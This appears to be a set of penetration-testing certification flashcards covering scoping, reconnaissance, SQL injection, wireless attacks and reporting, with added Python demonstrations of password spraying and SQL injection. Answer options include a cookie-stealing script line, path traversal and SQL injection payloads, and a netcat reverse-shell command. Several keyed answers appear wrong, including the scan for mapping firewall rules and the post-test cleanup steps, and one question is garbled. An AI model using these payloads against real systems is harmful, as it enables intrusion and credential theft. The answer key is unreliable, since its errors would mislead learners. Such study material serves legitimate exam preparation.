Exam Study Questions Flashcards

1
Q

A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website?
A. var adr = '../evil.php?test=' + escape(document.cookie);

B. ../../../../../../../../../../etc/passwd
C. /var/www/html/index.php;whoami
D. 1 UNION SELECT 1, DATABASE (), 3 –
A

D. 1 UNION SELECT 1, DATABASE (), 3 –

2
Q

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

A. Gain access to the target host and implant malware specially crafted for this purpose.
B. Exploit the local DNS server and add/update the zone records with a spoofed A record.
C. Use the Scapy utility to overwrite name resolution fields in the DNS query response.
D. Proxy HTTP connections from the target host to that of the spoofed host.

A

D. Proxy HTTP connections from the target host to that of the spoofed host.

3
Q

Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.)
A. Use of non-optimized sort functions
B. Poor input sanitization
C. Null pointer dereferences
D. Non-compliance with code style guide
E. Use of deprecated Javadoc tags
F. A cyclomatic complexity score of 3

A

B. Poor input sanitization
C. Null pointer dereferences

4
Q

A penetration tester has found indicators that a privileged user’s password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?
A. Hydra
B. John the Ripper
C. Cain and Abel
D. Medusa

A

D. Medusa

5
Q

A penetration tester was able to compromise a server and escalate privileges. Which of the following should the tester perform AFTER concluding the activities on the specified target? (Choose two.)
A. Remove the logs from the server.
B. Restore the server backup.
C. Disable the running services.
D. Remove any tools or scripts that were installed.
E. Delete any created credentials.
F. Reboot the target server.

A

C. Disable the running services.
E. Delete any created credentials.

6
Q

A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:

;; ANSWER SECTION
comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com.
comptia.org. 3569 IN A 3.219.13.186.
comptia.org. 3569 IN NS ns1.comptia.org.
comptia.org. 3569 IN SOA haven. administrator.comptia.org.
comptia.org. 3569 IN MX new.mx0.comptia.org.
comptia.org. 3569 IN MX new.mx1.comptia.org.

Which of the following potential issues can the penetration tester identify based on this output?

A. At least one of the records is out of scope.
B. There is a duplicate MX record.
C. The NS record is not within the appropriate domain.
D. The SOA record is outside the comptia.org domain.

A

A. At least one of the records is out of scope.

7
Q

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?
A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer

A

C. Nmap

8
Q

Deconfliction is necessary when the penetration test:
A. determines that proprietary information is being stored in cleartext.
B. occurs during the monthly vulnerability scanning.
C. uncovers indicators of prior compromise over the course of the assessment.
D. proceeds in parallel with a criminal digital forensic investigation.

A

C. uncovers indicators of prior compromise over the course of the assessment.

9
Q

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?
A. Hashcat
B. Mimikatz
C. Patator
D. John the Ripper

A

C. Patator

10
Q

PCI DSS requires which of the following as part of the penetration-testing process?

A. The penetration tester must have cybersecurity certifications.
B. The network must be segmented.
C. Only externally facing systems should be tested.
D. The assessment must be performed during non-working hours.

A

B. The network must be segmented.

11
Q

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.

A

C. The client applies patches to the systems.

12
Q

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?
A. nmap -sn 192.168.0.1/16
B. nmap -sn 192.168.0.1-254
C. nmap -sn 192.168.0.1 192.168.0.1.254
D. nmap -sN 192.168.0.0/24

A

B. nmap -sn 192.168.0.1-254

13
Q

A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
A. Steganography
B. Metadata removal
C. Encryption
D. Encode64

A

A. Steganography

14
Q

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?
A. Terminate the contract.
B. Update the ROE with new signatures.
C. Scan the 8-bit block to map additional missed hosts.
D. Continue the assessment.

A

B. Update the ROE with new signatures.

15
Q

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A. Add a dependency checker into the tool chain.
B. Perform routine static and dynamic analysis of committed code.
C. Validate API security settings before deployment.
D. Perform fuzz testing of compiled binaries.

A

A. Add a dependency checker into the tool chain.

16
Q

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?
A. Pick a lock.
B. Disable the cameras remotely.
C. Impersonate a package delivery worker.
D. Send a phishing email.

A

D. Send a phishing email.

17
Q

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?
A. Key reinstallation
B. Deauthentication
C. Evil twin
D. Replay

A

B. Deauthentication

18
Q

A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)
A. MX records
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results

A

D. Internet search engines
F. Shodan results

19
Q

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host discovery and write the discovery to files without returning results of the attack machine?

A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt

B. nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d "" -f5 > live-hosts.txt

C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service

D. nmap -sS -Pn -n -iL target.txt -oA target_txtl

A

A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt

20
Q

A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?
A. To meet PCI DSS testing requirements
B. For testing of the customer’s SLA with the ISP
C. Because of concerns regarding bandwidth limitations
D. To ensure someone is available if something goes wrong

A

D. To ensure someone is available if something goes wrong

21
Q

An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run?
A. nmap -sA 192.168.0.1/24
B. nmap -sS 192.168.0.1/24
C. nmap -oG 192.168.0.1/24
D. nmap 192.168.0.1/24

A

B. nmap -sS 192.168.0.1/24

22
Q

During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT?

A. Deny that the vulnerability existed
B. Investigate the penetration tester.
C. Accept that the client was right.
D. Fire the penetration tester.

A

B. Investigate the penetration tester.

23
Q

A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

A. Patch installations
B. Successful exploits
C. Application failures
D. Bandwidth limitations

A

D. Bandwidth limitations

24
Q

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the number of the service. Which of the following methods would BEST support validation of the possible findings?

A. Manually check the version number of the VoIP service against the CVE release.
B. Test with proof-of-concept code from an exploit database on a non-production system.
C. Review SIP traffic from an on-path position to look for indicators of compromise.
D. Execute an nmap -sV scan against the service.

A

A. Manually check the version number of the VoIP service against the CVE release.

25
Q

Which of the following are the MOST important items for prioritizing fixes that should be included in the final report for a penetration test? (Choose two.)

A. The CVSS score of the finding
B. The network location of the vulnerable device
C. The vulnerability identifier
D. The client acceptance form
E. The name of the person who found the flaw
F. The tool used to find the issue

A

A. The CVSS score of the finding
C. The vulnerability identifier

26
Q

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

A. MD5
B. bcrypt
C. SHA-1
D. PBKDF2

A

A. MD5

27
Q

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

A. Cross-site request forgery
B. Server-side request forgery
C. Remote file inclusion
D. Local code inclusion

A

B. Server-side request forgery

28
Q

A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?

A. GDB
B. Burp Suite
C. SearchSploit
D. Netcat

A

A. GDB

29
Q

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?

A. Scraping social media for personal details
B. Registering domain names that are similar to the target company’s
C. Identifying technical contacts at the company
D. Crawling the company’s website for company information

A

A. Scraping social media for personal details

30
Q

A penetration-testing team needs to test the security of electronic records in a company’s office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?

A. Prying the lock open on the records room
B. Climbing in an open window of the adjoining building
C. Presenting a false employee ID to the night guard
D. Obstructing the motion sensors in the hallway of the records room

A

C. Presenting a false employee ID to the night guard

31
Q

A penetration tester discovers during a recent test that an employee in the accounting department had been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to discourage this type of activity in the future?

A. Enforce mandatory employee vacations.
B. Implement multifactor authentication.
C. Install video surveillance equipment in the office.
D. Encrypt passwords for bank account information.

A

A. Enforce mandatory employee vacations.

32
Q

A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

A. Configure wireless access to use a AAA server.
B. Use random MAC addresses on the penetration testing distribution.
C. Install a host-based firewall on the penetration testing distribution.
D. Connect to the penetration testing company’s VPS using a VPN.

A

D. Connect to the penetration testing company’s VPS using a VPN.

33
Q

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system. After running a few commands, the tester runs the following:

python -c 'import pty; pty.spawn("/bin/bash")'

Which of the following actions is the penetration tester performing?

A. Privilege escalation
B. Upgrading the shell
C. Writing a script for persistence
D. Building a bind shell

A

B. Upgrading the shell

34
Q

A penetration tester opened a shell on a laptop at a client’s office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

A. Set up a captive portal with embedded malicious code.
B. Capture handshakes from wireless clients to crack.
C. Span deauthentication packets to the wireless clients.
D. Set up another access point and perform an evil twin attack.

A

D. Set up another access point and perform an evil twin attack.

35
Q

A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?

A. Segment the firewall from the cloud.
B. Scan the firewall for vulnerabilities.
C. Notify the client about the firewall.
D. Apply patches to the firewall.

A

C. Notify the client about the firewall.

36
Q

A penetration tester is looking for vulnerabilities within a company’s web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:

1;SELECT Username, Password FROM Users;

Which of the following injection attacks is the penetration tester using?

A. Blind SQL
B. Boolean SQL
C. Stacked queries
D. Error-based

A

C. Stacked queries

37
Q

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

A. Dictionary
B. Directory
C. Symlink
D. Catalog
E. For-loop

A

A. Dictionary

38
Q

A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

A. inurl:
B. link:
C. site:
D. intitle:

A

C. site:

39
Q

A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client’s expectations?

A. OWASP Top 10
B. MITRE ATT&CK framework
C. NIST Cybersecurity Framework
D. The Diamond Model of Intrusion Analysis

A

B. MITRE ATT&CK framework

40
Q

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A. The SSL certificates were invalid.
B. The tester IP was blocked.
C. The scanner crashed the system.
D. The web page was not found.

A

B. The tester IP was blocked.

41
Q

A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:

x' OR role LIKE '%admin%

Which of the following should be recommended to remediate this vulnerability?

A. Multifactor authentication
B. Encrypted communications
C. Secure software development life cycle
D. Parameterized queries

A

D. Parameterized queries

42
Q

Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

A. SOW
B. SLA
C. MSA
D. NDA

A

A. SOW

43
Q

In Python socket programming, SOCK_DGRAM type is:

A. reliable.
B. matrixed.
C. connectionless.
D. slower.

A

C. connectionless.

44
Q

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A. Executive summary
B. Remediation
C. Methodology
D. Metrics and measures

A

B. Remediation

45
Q

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

A. An unknown-environment assessment
B. A known-environment assessment
C. A red-team assessment
D. A compliance-based assessment

A

C. A red-team assessment

46
Q

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client’s data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester’s decision?

A. The tester had the situational awareness to stop the transfer.
B. The tester found evidence of prior compromise within the data set.
C. The tester completed the assigned part of the assessment workflow.
D. The tester reached the end of the assessment time frame.

A

A. The tester had the situational awareness to stop the transfer.

47
Q

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?

A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https

A

D. windows/x64/powershell_reverse_tcp

48
Q

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

A. Situational awareness
B. Rescheduling
C. DDoS defense
D. Deconfliction

A

D. Deconfliction

49
Q

Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A. Exploit-DB
B. Metasploit
C. Shodan
D. Retina

A

A. Exploit-DB

50
Q

A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

A. To trick the systems administrator into installing a rootkit
B. To close down a reverse shell
C. To remove a web shell after the penetration test
D. To delete credentials the tester created

A

C. To remove a web shell after the penetration test

51
Q

A company provided the following network scope for a penetration test:

  • 169.137.1.0/24
  • 221.10.1.0/24
  • 149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

A. The company that requested the penetration test
B. The penetration testing company
C. The target host’s owner
D. The penetration tester
E. The subcontractor supporting the test

A

A. The company that requested the penetration test

52
Q

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?

A. Create a custom password dictionary as preparation for password spray testing.

B. Recommend using a password manager/vault instead of text files to store passwords securely.

C. Recommend configuring password complexity rules in all the systems and applications.

D. Create a TPM-backed sealed storage location within which the unprotected file repository can be reported.

A

B. Recommend using a password manager/vault instead of text files to store passwords securely.

53
Q

During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

A. Linux
B. NetBSD
C. Windows
D. macOS

A

C. Windows

54
Q

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

A. Prohibiting exploitation in the production environment
B. Requiring all testers to review the scoping document carefully
C. Never assessing the production networks
D. Prohibiting testers from joining the team during the assessment

A

B. Requiring all testers to review the scoping document carefully

56
Q

A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?

A. The injection was too slow.
B. The DNS information was incorrect.
C. The DNS cache was not refreshed.
D. The client did not receive a trusted response.

A

C. The DNS cache was not refreshed.

57
Q

During an assessment, a penetration tester was able to access the organization’s wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

A. Changing to Wi-Fi equipment that supports strong encryption
B. Using directional antennae
C. Using WEP encryption
D. Disabling Wi-Fi

A

A. Changing to Wi-Fi equipment that supports strong encryption

58
Q

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:

IP Address: 192.168.1.63
Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

A. tcpdump -i eth01 arp and arp[6:2] == 2
B. arp -s 192.168.1.63 60-36-DD-A6-C5-33
C. ipconfig /all findstr /v 00-00-00 | findstr Physical
D. route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

A

B. arp -s 192.168.1.63 60-36-DD-A6-C5-33

59
Q

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

A. Vulnerability scanning
B. Network segmentation
C. System hardening
D. Intrusion detection

A

B. Network segmentation

60
Q

A security analyst needs to perform a scan for SMB port 445 over a /16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

A. Nmap -s 445 -Pn -T5 172.21.0.0/16
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16
C. Nmap -sV --script=smb* 172.21.0.0/16
D. Nmap -p 445 -max -sT 172. 21.0.0/16

A

B. Nmap -p 445 -n -T4 -open 172.21.0.0/16

61
Q

A penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

A. Peach
B. WinDbg
C. GDB
D. OllyDbg

A

C. GDB

62
Q

A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client’s system. The tester would like to suggest mitigation to the client as soon as possible.
Which of the following remediation techniques would be the BEST to recommend? (Choose two.)

A. Closing open services
B. Encrypting users' passwords
C. Randomizing users’ credentials
D. Users’ input validation
E. Parameterized queries
F. Output encoding

A

D. Users’ input validation
E. Parameterized queries

63
Q

Which of the following is a rules engine for managing public cloud accounts and resources?

A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite

A

A. Cloud Custodian

64
Q

A penetration tester will be performing a vulnerability scan as part of the penetration test on a client’s website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?

A. -a8 -T0
B. --script "httpvuln"
C. -sn
D. -O -A

A

B. --script "httpvuln"

65
Q

A penetration tester discovered that a client uses cloud mail as the company’s email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

A. Credential harvesting
B. Privilege escalation
C. Password spraying
D. Domain record abuse

A

A. Credential harvesting

66
Q

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company’s website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

A. Mask
B. Rainbow
C. Dictionary
D. Password spraying

A

D. Password spraying
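The mechanics behind this answer, as an added example that is not part of the original flashcard set: a password spray tries one password across every derived username per round and paces the rounds so no single account accumulates enough failures inside the lockout window, while a per-account brute force trips the lockout on the first user it touches. The directory, its lockout policy (3 failures in 30 minutes), the 30 e-mail addresses and the candidate passwords are all constructed for the example.

```python
from collections import defaultdict

# Constructed data: 30 addresses "crawled" from the site and the inferred first.last format
EMAILS = [f"user{i:02d}.smith@company.example" for i in range(30)]
CANDIDATE_PASSWORDS = ["Winter2023!", "Company123", "Welcome1"]


def usernames_from_emails(emails):
    """first.last@company.example -> first.last (the username format guessed from the e-mails)."""
    return [e.split("@", 1)[0].lower() for e in emails]


class MockDirectory:
    """Stand-in for the target's authentication service with an AD-style lockout policy:
    `threshold` failures within `window` seconds locks the account."""

    def __init__(self, creds, threshold=3, window=30 * 60):
        self.creds, self.threshold, self.window = creds, threshold, window
        self.failures = defaultdict(list)   # user -> timestamps of recent failures
        self.locked = set()

    def authenticate(self, user, password, now):
        if user in self.locked:
            return "locked"
        if self.creds.get(user) == password:
            return "success"
        self.failures[user] = [t for t in self.failures[user] if now - t < self.window] + [now]
        if len(self.failures[user]) >= self.threshold:
            self.locked.add(user)
            return "locked"
        return "fail"


def brute_force_one_user(directory, user, passwords, now=0):
    """The naive approach: many passwords against one account; trips the lockout."""
    for pw in passwords:
        result = directory.authenticate(user, pw, now)
        now += 1
        if result == "success":
            return pw
        if result == "locked":
            return None
    return None


def spray(directory, users, passwords, threshold=3, window=30 * 60, now=0):
    """Password spraying: one password across every user per round, and at most
    threshold-1 rounds inside one lockout window before waiting the window out."""
    hits, rounds_in_window = [], 0
    for pw in passwords:
        if rounds_in_window == threshold - 1:
            now += window            # let the directory forget the earlier failures
            rounds_in_window = 0
        for user in users:
            if directory.authenticate(user, pw, now) == "success":
                hits.append((user, pw))
            now += 1                 # one attempt per second
        rounds_in_window += 1
    return hits


if __name__ == "__main__":
    users = usernames_from_emails(EMAILS)
    creds = {u: "Unguessable#9" for u in users}
    creds["user07.smith"] = "Company123"      # the one weak password in the constructed directory
    d = MockDirectory(creds)
    print(spray(d, users, CANDIDATE_PASSWORDS), "locked:", d.locked)
```

In a real engagement the threshold and window come from the client's lockout policy (obtained in scoping or read from the domain policy), and the spray is paced against the observation window rather than the lockout duration.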

67
Q

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host discovery and write the discovery to files without returning results of the attack machine?

A. nmap -sn -n --exclude 10.1.1.15 10.1.1.0/24 -oA target_txt
B. nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt
C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service
D. nmap -sS -Pn -n -iL target.txt -oA target_txt1

A

A. nmap -sn -n --exclude 10.1.1.15 10.1.1.0/24 -oA target_txt

-sn performs host discovery only (no port scan), --exclude drops the attacking machine (10.1.1.15) from the results, and -oA writes normal, grepable and XML output files. Options C and D are port and service scans of an already-prepared target list and exclude nothing; option B scans ten random Internet hosts (-iR), not the local segment.

68
Q

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

A. DirBuster
B. CeWL
C. w3af
D. Patator

A

B. CeWL

69
Q

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY '00:00:05'

Which of the following should the penetration tester attempt NEXT?

A. http://company.com/catalog.asp?productid=22;EXEC xp_cmdshell 'whoami'

B. http://company.com/catalog.asp?productid=22' OR 1=1 --

C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --

D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

A

B. http://company.com/catalog.asp?productid=22' OR 1=1 --
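To make the two SQL injection cards concrete (the payloads in this question and the remediation choices in question 62), here is an added example that is not part of the original flashcards. It builds a constructed product table in SQLite, shows the string-concatenation bug that makes `22' OR 1=1 --` return the whole catalog, shows the column-count probe behind the `UNION SELECT 1,2,3 --` option, and puts the two recommended fixes beside it: a parameterized query and allow-list input validation. SQLite has no `WAITFOR DELAY` (that is T-SQL), so the time-based probe from the question is not reproduced.

```python
import sqlite3

# Payload from option B (constructed catalog, not the real company.com site)
PAYLOAD_OR = "22' OR 1=1 --"


def build_catalog():
    """In-memory stand-in for the shop's product table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE catalog (productid INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO catalog VALUES (?, ?, ?)",
                     [(22, "Widget", 9.99), (23, "Gadget", 19.99), (24, "Gizmo", 4.50)])
    return conn


def lookup_vulnerable(conn, productid):
    """The catalog.asp anti-pattern: user input spliced straight into the SQL string."""
    sql = f"SELECT productid, name, price FROM catalog WHERE productid = '{productid}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, productid):
    """Remediation 1 (parameterized query): a bound value is data, never SQL."""
    sql = "SELECT productid, name, price FROM catalog WHERE productid = ?"
    return conn.execute(sql, (productid,)).fetchall()


def validate_productid(value):
    """Remediation 2 (input validation): a product id is a short run of digits, nothing else."""
    return value.isdigit() and len(value) <= 9


def find_union_column_count(conn, max_cols=8):
    """Attacker-side probe behind option C: grow UNION SELECT 1,2,...,n until the
    database stops rejecting the column-count mismatch."""
    for n in range(1, max_cols + 1):
        columns = ",".join(str(i) for i in range(1, n + 1))
        try:
            lookup_vulnerable(conn, f"22' UNION SELECT {columns} --")
            return n
        except sqlite3.OperationalError:
            continue
    return None


if __name__ == "__main__":
    db = build_catalog()
    print(lookup_vulnerable(db, "22"))            # one product
    print(lookup_vulnerable(db, PAYLOAD_OR))      # every product: the WHERE clause is now always true
    print(lookup_parameterized(db, PAYLOAD_OR))   # []: the payload is compared as a literal string
    print(find_union_column_count(db))            # 3
```

Parameterization is the fix that removes the vulnerability class; validation is defence in depth that also stops the `;WAITFOR DELAY` and `;EXEC` stacked-query payloads before they reach the database driver.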

70
Q

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A. A vulnerability scan
B. A WHOIS lookup
C. A packet capture
D. An Nmap scan

A

A. A vulnerability scan

71
Q

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning
B. Watering-hole attack
C. Impersonation
D. Spear phishing

A

D. Spear phishing

72
Q

Which of the following compliance requirements would be BEST suited in an environment that processes credit card data?

A. PCI DSS
B. ISO 27001
C. SOX
D. GDPR

A

A. PCI DSS

73
Q

A penetration tester successfully infiltrated the targeted web server and created credentials with administrative privileges. After conducting data exfiltration, which of the following should be the tester’s NEXT step?

A. Determine what data is available on the web server.
B. Change or delete the logs.
C. Log out and migrate to a new session.
D. Log in as the new user.

A

B. Change or delete the logs.

Note: covering tracks is only acceptable when the rules of engagement explicitly permit it. Otherwise the tester leaves logs intact, removes the accounts and tooling the test created, and reports exactly what was changed so the client can verify the cleanup.

74
Q

A penetration tester analyzed a web-application log file and discovered an input that was sent to the company’s web application. The input contains a string that says “WAITFOR.” Which of the following attacks is being attempted?

A. SQL injection
B. HTML injection
C. Remote command injection
D. DLL injection

A

A. SQL injection

75
Q

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management

A

D. Patch management

76
Q

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

A. Statement of work
B. Program scope
C. Non-disclosure agreement
D. Rules of engagement

A

D. Rules of engagement

77
Q

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A. Use Patator to pass the hash and Responder for persistence.
B. Use Hashcat to pass the hash and Empire for persistence.
C. Use a bind shell to pass the hash and WMI for persistence.
D. Use Mimikatz to pass the hash and PsExec for persistence.

A

D. Use Mimikatz to pass the hash and PsExec for persistence.

78
Q

The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

A. NDA
B. SLA
C. MSA
D. SOW

A

A. NDA

79
Q

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog

A

D. /var/log/lastlog

lastlog is a binary file with one fixed-size record per UID that holds only the most recent login for each account; read it with the lastlog command. The full login history (every session, in order) is in /var/log/wtmp, read with last.

80
Q

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?

A. WHOIS domain lookup
B. Job listing and recruitment ads
C. SSL certificate information
